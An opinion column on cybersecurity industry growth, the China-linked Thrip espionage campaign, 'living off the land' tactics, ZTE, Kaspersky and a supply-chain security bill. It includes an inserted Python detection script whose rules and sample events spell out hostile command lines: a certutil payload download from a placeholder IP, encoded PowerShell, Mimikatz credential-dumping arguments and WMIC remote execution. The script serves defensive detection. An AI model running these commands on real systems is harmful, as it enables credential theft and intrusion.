What’s been more beneficial for the U.S. economy? President Trump and his economic policies — or China and Russia? At least for the cybersecurity sector, many firms should be thanking our adversaries for a growing business.
Several cybersecurity startups are making tremendous gains in this field, despite some setbacks in IPOs (initial public offerings) and investor anxiety. The recent announcement by CrowdStrike shows the seriousness of digital warfare: The latest Silicon Valley unicorn (a startup valued at more than $1 billion) just raised $200 million to reach a $3 billion valuation. That's a whole lot of zeros for a business that's about ones and zeros.
Add two other rising superstars, Tanium and Tenable, and billions of dollars are in play to defend and protect our growing reliance on connecting everything to the internet. Even Symantec, recently hit hard by an audit investigation, is still a force to be reckoned with, especially after its latest discovery of yet another threat actor with a very insidious approach.
“Thrip” is the name given to a group most likely operating out of China. Symantec’s analysis identified three computers in China being used to launch these new attacks against “communications, geospatial imaging, and defense sectors, both in the United States and Southeast Asia.”
One of the most troubling aspects of this campaign was the targeting of a satellite communications operator. As a country, we have a tremendous reliance on satellites, from communications, transportation and television to navigation. So does our military. The need for accurate GPS information extends to the delivery of supplies and personnel, as well as weapons. If our main adversaries can’t hack or jam the satellites, they can resort to blowing them out of orbit.
Another troubling development in the methods of attack involves turning the targets' own tools against them, or, in military parlance, "living off the land." (During the Civil War, Gen. Ulysses Grant moved 40,000 troops to a point 30 miles south of Vicksburg in order to capture the last remaining stronghold on the Mississippi River; this meant abandoning his supply lines and forcing his troops to live off the land and the enemy's own resources.)
In the case of Thrip's espionage campaign, many of the tools used to conduct the alleged intrusions already existed on the targeted systems. Because there is nothing malicious about those binaries in themselves, scanning for known malware signatures finds little; the intrusion shows up only in how the tools are used, by whom, and from where. That is what makes behavioral analytics and AI (artificial intelligence) so important for detecting hidden attacks. Winning the AI and robotics war against China (as I discussed here) is more important than ever, if the United States is to maintain dominance in cyberspace.
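The behavior-based detection the paragraph argues for, shown as an added example that is not from the column, from Symantec, or from any vendor product: a small Python triage of process-creation events (the kind an endpoint agent such as Sysmon records) that flags misuse of legitimate tools by how they are invoked, who launched them and what arguments they carry, rather than by which binary is on disk. The tool classes covered (PsExec, PowerShell, certutil, WMI, a Mimikatz-style credential dumper) are the usual "living off the land" suspects; the events, host names, file paths, the Base64 payload and the escalation threshold are all constructed for this example and are not taken from the Thrip report.

```python
"""Behavioral triage of process-creation events for "living off the land" activity.

Added example. Every event below is constructed; nothing here is real telemetry.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class ProcEvent:
    host: str
    parent_image: str   # full path of the parent process
    image: str          # full path of the new process
    cmdline: str        # full command line of the new process


@dataclass
class Rule:
    name: str
    image: Optional[str] = None     # regex on the basename of the new process
    parent: Optional[str] = None    # regex on the basename of the parent
    cmdline: Optional[str] = None   # regex on the full command line


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


# Each rule describes a *use* of a legitimate tool, not the tool itself. The
# thresholds and patterns are the example's own choices, not a published ruleset.
RULES: List[Rule] = [
    Rule("encoded-powershell", image=r"^powershell\.exe$",
         cmdline=r"(?i)(^|\s)-(encodedcommand|enc|ec|e)\s+[A-Za-z0-9+/=]{20,}"),
    Rule("powershell-download-cradle", image=r"^powershell\.exe$",
         cmdline=r"(?i)(downloadstring|downloadfile|invoke-webrequest|net\.webclient|start-bitstransfer)"),
    Rule("certutil-download", image=r"^certutil\.exe$", cmdline=r"(?i)-urlcache"),
    Rule("psexec-service", image=r"^psexesvc\.exe$", parent=r"^services\.exe$"),
    Rule("wmic-remote-exec", image=r"^wmic\.exe$",
         cmdline=r"(?i)/node:.+process\s+call\s+create"),
    # No image constraint: a renamed dumper still needs these arguments to work.
    Rule("credential-dumping-args", cmdline=r"(?i)(sekurlsa::|lsadump::|privilege::debug)"),
    Rule("office-spawns-shell",
         parent=r"^(winword|excel|powerpnt|outlook)\.exe$",
         image=r"^(powershell|cmd|wscript|cscript|mshta|regsvr32)\.exe$"),
]


def matches(rule: Rule, ev: ProcEvent) -> bool:
    """True when every constraint the rule defines is satisfied by the event."""
    if rule.image and not re.search(rule.image, basename(ev.image)):
        return False
    if rule.parent and not re.search(rule.parent, basename(ev.parent_image)):
        return False
    if rule.cmdline and not re.search(rule.cmdline, ev.cmdline):
        return False
    return True


def classify(ev: ProcEvent) -> List[str]:
    """Names of every rule the event trips, in RULES order (empty if none)."""
    return [r.name for r in RULES if matches(r, ev)]


def triage(events: List[ProcEvent], escalate_at: int = 2) -> Dict[str, dict]:
    """Group hits per host. One hit may be routine admin work; several *distinct*
    tool abuses on the same host look like hands-on-keyboard activity and are
    marked for escalation. Hosts with no hits are omitted."""
    per_host: Dict[str, dict] = {}
    for ev in events:
        for name in classify(ev):
            entry = per_host.setdefault(ev.host, {"rules": set(), "hits": []})
            entry["rules"].add(name)
            entry["hits"].append((name, ev.cmdline))
    for entry in per_host.values():
        entry["rules"] = sorted(entry["rules"])
        entry["escalate"] = len(entry["rules"]) >= escalate_at
    return per_host


# Constructed sample events (hosts, paths and the Base64 blob are invented).
SAMPLE_EVENTS: List[ProcEvent] = [
    # 0: hidden, Base64-encoded PowerShell launched from the desktop
    ProcEvent("ws-101", r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoP -W Hidden -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA"),
    # 1: PsExec's service-side component, installed by the Service Control Manager
    ProcEvent("ws-101", r"C:\Windows\System32\services.exe",
              r"C:\Windows\PSEXESVC.exe", r"C:\Windows\PSEXESVC.exe"),
    # 2: credential dumper renamed to an innocent name; the arguments give it away
    ProcEvent("srv-fs2", r"C:\Windows\System32\cmd.exe", r"C:\Users\Public\svchost.exe",
              r'"C:\Users\Public\svchost.exe" privilege::debug sekurlsa::logonpasswords exit'),
    # 3-4: a Word document spawns cmd.exe, which uses certutil to fetch a payload
    ProcEvent("ws-204", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c certutil -urlcache -split -f http://198.51.100.7/a.txt %TEMP%\\a.exe"),
    ProcEvent("ws-204", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\certutil.exe",
              "certutil -urlcache -split -f http://198.51.100.7/a.txt %TEMP%\\a.exe"),
    # 5: WMI used to start a process on another host
    ProcEvent("ws-101", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\wbem\WMIC.exe",
              'wmic /node:srv-fs2 /user:corp\\admin process call create "cmd /c whoami > c:\\out.txt"'),
    # 6-7: benign use of the very same tools
    ProcEvent("ws-310", r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),
    ProcEvent("ws-310", r"C:\Windows\System32\services.exe", r"C:\Windows\System32\svchost.exe",
              "svchost.exe -k netsvcs -p -s Schedule"),
]


if __name__ == "__main__":
    for host, entry in triage(SAMPLE_EVENTS).items():
        flag = "ESCALATE" if entry["escalate"] else "review"
        print(f"{host}: {flag} {entry['rules']}")
```

The point of the design is that none of the rules asks "is this file malware?" Event 2 is a renamed binary, so a hash or filename check finds nothing, but the `sekurlsa::` argument is unavoidable for the tool to do its job; event 3 is plain `cmd.exe`, which is only suspicious because Word launched it. The per-host threshold is what keeps a single administrator running PsExec from paging the on-call analyst while still surfacing a box where three different legitimate tools are being abused in sequence.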
This campaign, while bearing all the hallmarks of espionage, also has the capacity to disrupt operational systems. In a time of conflict, as in the South China Sea, disrupting satellites and communications would leave us deaf and blind to a significant extent.
Besides “living off the land,” another dangerous tactic is “hiding in plain sight,” as in the case of ZTE and Kaspersky Labs.
ZTE, the Chinese telecommunications giant, still hasn’t made it back from the financial brink after receiving an economic death penalty, even though President Trump is helping it to find a way out. One of the biggest concerns within the U.S. intelligence community was that ZTE could spy on our government and consumers by hiding malicious software and hardware inside its phones.
Russia's Kaspersky Labs also received a "red card" (in recognition of the mania being exhibited for the 2018 FIFA World Cup). It was banned from the computer systems of the federal government, including the Department of Defense. Its main lab is in Moscow, and, according to U.S. press reports, its antivirus software was the means by which the FSB, the successor to the Soviet-era KGB, obtained a treasure trove of NSA hacking tools from a contractor's home computer that was running it.
While it may be nearly impossible to stop the “living off the land” strategy, Congress has finally decided that it ought to do something about the “hiding in plain sight” threat. In a rare bipartisan move, a bill was introduced on June 19 to create a council that would have responsibility for evaluating supply-chain risks that could impact national security.
The Federal Acquisition Supply Chain Security Act (FASCSA) was a direct response to the concerns over ZTE and Kaspersky. The bill also aims to keep the ban against ZTE in place and to prevent President Trump from cutting a deal with China. If it survives, it will do what should have been done a long time ago: directly involve members of the intelligence community and consult with the private sector.
The Federal Acquisition Security Council would be made up of the Office of Management and Budget (OMB), the General Services Administration (GSA), the Department of Homeland Security (DHS), the Office of the Director of National Intelligence (ODNI), the Federal Bureau of Investigation (FBI), the Department of Defense (DOD) and the National Institute of Standards and Technology (NIST).
According to the press release:
“For years, the Intelligence Community was aware of the risk that Kaspersky Labs antivirus products posed to national security, but that information was not widely shared with other government agencies. The bill raises awareness across the government by breaking down silos between national security and civilian agencies and requires them to develop a strategy together that confronts supply chain risk management in government purchasing of IT.”
Finally — geeks, spooks, g-men and policy wonks, all working together. Maybe there really is a Santa Claus.
Morgan Wright is an expert on cybersecurity strategy, cyberterrorism, identity theft and privacy. Previously Morgan was a senior advisor in the U.S. State Department Antiterrorism Assistance Program and senior law enforcement advisor for the 2012 Republican National Convention. Follow him on Twitter @morganwright_us.